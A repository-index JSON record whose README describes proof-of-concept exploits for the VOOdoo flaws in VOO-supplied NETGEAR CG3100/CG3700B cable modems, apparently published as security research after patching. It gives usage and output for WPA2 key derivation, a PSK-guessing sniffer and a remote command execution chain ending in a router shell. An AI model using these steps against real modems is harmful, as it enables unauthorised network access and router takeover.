{"id":23075070,"url":"https://github.com/qkaiser/voodoo","last_synced_at":"2025-08-15T17:31:34.403Z","repository":{"id":43141209,"uuid":"345779347","full_name":"qkaiser/voodoo","owner":"qkaiser","description":"This repository holds proof-of-concepts for the VOOdoo vulnerabilities found in NETGEAR CG3100 and CG3700B cable modems provided by VOO to its subscribers.","archived":false,"fork":false,"pushed_at":"2021-04-01T08:48:52.000Z","size":92,"stargazers_count":17,"open_issues_count":0,"forks_count":3,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-03T18:12:55.816Z","etag":null,"topics":["cg3100","cg3700","exploit","netgear","voo","wireless"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/qkaiser.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-03-08T20:01:31.000Z","updated_at":"2024-01-16T16:27:00.000Z","dependencies_parsed_at":"2022-09-02T20:20:53.648Z","dependency_job_id":null,"html_url":"https://github.com/qkaiser/voodoo","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/qkaiser/voodoo","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qkaiser%2Fvoodoo","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qkaiser%2Fvoodoo/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qkaiser%2Fvoodoo/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qkaiser%2Fvoodoo/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/qkaiser","download_url":"https://co
deload.github.com/qkaiser/voodoo/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qkaiser%2Fvoodoo/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":270603806,"owners_count":24614572,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-15T02:00:12.559Z","response_time":110,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cg3100","cg3700","exploit","netgear","voo","wireless"],"created_at":"2024-12-16T08:38:29.519Z","updated_at":"2025-08-15T17:31:34.075Z","avatar_url":"https://github.com/qkaiser.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# VOOdoo - Research Notes\n\n![lol](voodoo_logo.png)\n\nThis repository holds proof-of-concepts for the VOOdoo vulnerabilities found in NETGEAR CG3100 and CG3700B cable modems provided by VOO to its subscribers.\n\nThese modems use a weak algorithm to generate WPA2 pre-shared keys, allowing an attacker in reception range of a vulnerable modem to derive the WPA2 pre-shared key from the access point MAC address. The modems are also vulnerable to remote code execution through the web administration panel. 
The exploit is possible due to usage of default credentials and programming errors in multiple form handlers.\n\nBy chaining these vulnerabilities, an attacker can gain unauthorized access to VOO customers' LAN (over the Internet or by being in reception range of the access point), fully compromise the router, and leave a persistent backdoor allowing direct remote access to the network.\n\n### SSID generator\n\nGenerate the SSID from a MAC address the same way Netgear CG3100 and CG3700B devices do.\n\n```\npython3 genssid.py a4:2b:8c:a0:c0:b8\nVOO-984071\n```\n\n### WPA2 PSK Generator\n\nThe *wifi/brutepsk.py* script will generate a list of valid WPA2 PSK candidates by using\na list of observed Netgear OUIs in Wigle and validating them by using the provided\nSSID as an oracle.\n\nWith the current list, you'll get around 120 candidates for a given SSID.\n\n```\ntime python3 brutepsk.py VOO-984071\n--snip--\n[+] Potential candidate found (MAC: 0x001E2AFE426B) - PXBXLGRG\n[+] Potential candidate found (MAC: 0x001E2AFEA994) - XXDOHLZZ\n[+] Potential candidate found (MAC: 0x001F330498FC) - DOPZHBPA\n--snip--\npython3 brutepsk.py VOO-984071  285,18s user 0,03s system 99% cpu 4:45,26 total\n```\n\n### Network Sniffer with Automatic PSK Guesser\n\n**This no longer works since the patch rollout**\n\nYou need to put your wireless interface in monitor mode and start scanning for devices around you using airodump:\n\n```\nsudo airmon-ng start wlp6s0\nsudo airodump-ng -i wlp6s0mon\n```\n\nWhile doing so, launch the sniffer script and it will list vulnerable access points:\n\n```\nsudo python sniffer.py\nAP MAC: 20:0c:c8:16:76:dc with SSID: VOO-111317 (PSK: VNCKUFXQ)\n```\n\n### Remote Command Execution (local network)\n\nThe callback is made to 192.168.100.2 so you need to set that address explicitly:\n\n```\nip addr add 192.168.100.2/24 dev eno1\nip r add 192.168.100.1 dev eno1 src 192.168.100.2\n```\n\nLaunch the callback server:\n\n```\npython2.7 server.py\n```\n\nRun the 
exploit:\n\n```\npython2.7 -W ignore exploit.py\n[+] Loading anti-csrf token\n[+] Got anti-csrf token (1756101231)\n[+] Triggering exploit.\n```\n\nIf everything worked as expected:\n\n```\npython2.7 server.py \n[+] Trying to bind to 0.0.0.0 on port 5504: Done\n[+] Waiting for connections on 0.0.0.0:5504: Got connection from 192.168.100.1 on port 1024\n[+] Got connection. Sending payload.\n[*] Switching to interactive mode\n$ help\n!               ?               REM             call            cd             \ndir             find_command    help            history         instances      \nls              man             pwd             sleep           syntax         \nsystem_time     usage           \n----\nClearCmCert     binarySfid      bpiShow         cfg_hex_show    cfg_tlv_show   \nch_state        clear_image     cm_ctrl         comp_mac_to_phy comp_phy_to_mac\ncopy_image      dbc_msg_inject  dload           dsdiag          dsx_show       \nevent_censor    goto_ds         goto_us         igmpShow        ip_initialize  \nip_show         l2vpn_show      link_state      log_messages    map_debug      \nmdd_modify      mdd_sets_show   modem_caps      nrg_mgmt        \noverride_ucd_max_burst          publish_event   rate_shaping_enable            \nreseq_dsid_regress_test         rng_rsp         scan_stop       showFlows      \nstate           stop_download   ucdShow         ucddiag         up_dis         \nus_phy_oh_show  us_target_mset  usdiag          \n----\n[dsxTest] [propane_ctl] \n```\n\n### Remote Command Execution (Internet)\n\n**This no longer works over the Internet since VOO applied mitigations (disabling UPnP, filtering DNS rebinding).** \n\nHowever, everything is available in index.html, and exploit.js if you want to study the code.\n\n\n## Video Demo\n\n![rce demo](voodoo_rce_demo.mp4)\n\n## References\n\n- VOOdoo - Remotely Compromising VOO Cable Modems - 
[https://quentinkaiser.be/security/2021/03/09/voodoo/](https://quentinkaiser.be/security/2021/03/09/voodoo/)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fqkaiser%2Fvoodoo","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fqkaiser%2Fvoodoo","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fqkaiser%2Fvoodoo/lists"}